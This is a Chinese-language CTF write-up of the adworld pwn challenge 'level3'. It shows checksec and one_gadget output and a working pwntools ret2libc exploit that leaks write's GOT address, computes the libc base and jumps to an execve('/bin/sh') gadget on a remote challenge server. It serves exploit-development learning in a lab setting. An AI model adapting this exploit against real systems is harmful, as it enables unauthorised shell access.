前言
pwn新手区还残留一题,就是这个level3,当初好像是因为远程打不通所以没做掉.我记得当初好像是没有给库的,现在给了个libc_32.so.6
0x00.检查保护
devil@ubuntu:~/adworld/pwn$ checksec level3
[*] '/home/devil/adworld/pwn/level3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found ;可以进行栈溢出
NX: NX enabled
PIE: No PIE (0x8048000)
0x01.栈溢出漏洞
read函数有明显栈溢出漏洞,程序本身不存在system("/bin/sh"),无法通过溢出直接getshell
0x02.one_gadget
自从学会了使用one_gadget,遇到给libc的题目屡试不爽
one_gadget使用实战看此
devil@ubuntu:~/adworld/pwn$ one_gadget libc_32.so.6
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
esi is the GOT address of libc
[esp+0x28] == NULL
0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
esi is the GOT address of libc
[esp+0x2c] == NULL
0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
esi is the GOT address of libc
[esp+0x30] == NULL
0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
esi is the GOT address of libc
[esp+0x34] == NULL
0x5f065 execl("/bin/sh", eax)
constraints:
esi is the GOT address of libc
eax == NULL
0x5f066 execl("/bin/sh", [esp])
constraints:
esi is the GOT address of libc
[esp] == NULL
使用one_gadget获得execve函数地址
execve = 0x3a80c
注意:
*cyclic计算得到溢出需要144字节,注意,144是输入到esp-4的距离(padding=144-4)。如果junk="A"144,在执行payload的时候程序会报错。
举例而言:
A: aaaa
B: aaab
C: aaac
D: aaad
cyclic -l aaaa = 4
cyclic -l aaad = 16
144-4表示输入的位置到esp的距离
0x03.思路
1.要执行execve,要先获得libc库的偏移,才能得到execve_addr
2.通过溢出执行execve从而getshell
3.通过write(1,addr,4)函数来泄露write函数地址,从而获得libc的偏移,再得到execve地址即可
0x04.exp
from pwn import *
p = remote("111.198.29.45",37840)
elf = ELF("./level3")
libc = ELF("./libc_32.so.6")
context(log_level='debug',arch='i386',os='linux')
execve = 0x3a80c #execve地址
junk = "A"*140
main_addr = elf.symbols['main']
write_got = elf.got['write']
write_plt = elf.plt['write']
payload1 = junk + p32(write_plt) + p32(main_addr)
payload1 += p32(1) + p32(write_got) + p32(4)
p.recv()
p.sendline(payload1)
data = p.recv()[:4]
write_addr = u32(data)
offset = write_addr - libc.symbols['write'] #计算libc偏移
execve_addr = offset + execve
payload = junk + p32(execve_addr)
p.sendlineafter("Input:\n",payload)
p.interactive()